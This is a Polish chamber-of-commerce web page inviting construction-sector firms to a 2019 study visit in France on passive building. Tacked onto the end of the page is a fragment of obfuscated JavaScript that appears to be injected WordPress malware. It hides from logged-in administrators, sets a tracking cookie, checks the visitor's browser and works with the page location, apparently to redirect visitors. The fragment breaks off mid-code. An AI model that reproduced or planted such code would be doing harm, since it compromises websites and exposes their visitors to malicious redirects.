Wizyta studyjna dla firm z branży budowlanej we Francji | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo,

W imieniu Zachodniopomorskiego Klastra Budowlanego zapraszamy do udziału w wizycie studyjnej, która odbędzie się we Francji, od 17 do 19 marca 2019r. Tematem przewodnim wizyty będzie budownictwo pasywne, a całe spotkanie odbędzie się
w międzynarodowym gronie przedsiębiorców z branży z krajów takich jak Niemcy, Litwa, Szwecja. W trakcie spotkania weźmiemy udział w seminarium, dowiemy się jak działa a przede zobaczymy jak funkcjonuje ten sektor we Francji. Odwiedzimy kilka modelowych miejsc oraz poznamy możliwości rozwoju branży w Europie.

Udział w spotkaniu jest finansowany przez Północną Izbę Gospodarczą. Zgłoszenia przyjmujemy do 25 lutego, pod adresem mailowym: kc@izba.info.

Zaproszenie skierowane jest do małych i średnich przedsiębiorstw z branży budowlanej i pokrewnej. Decyduje kolejność zgłoszeń.

Przewodniczący Zachodniopomorskiego Klastra Budowlanego,

Maciej Pirczewski

  'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m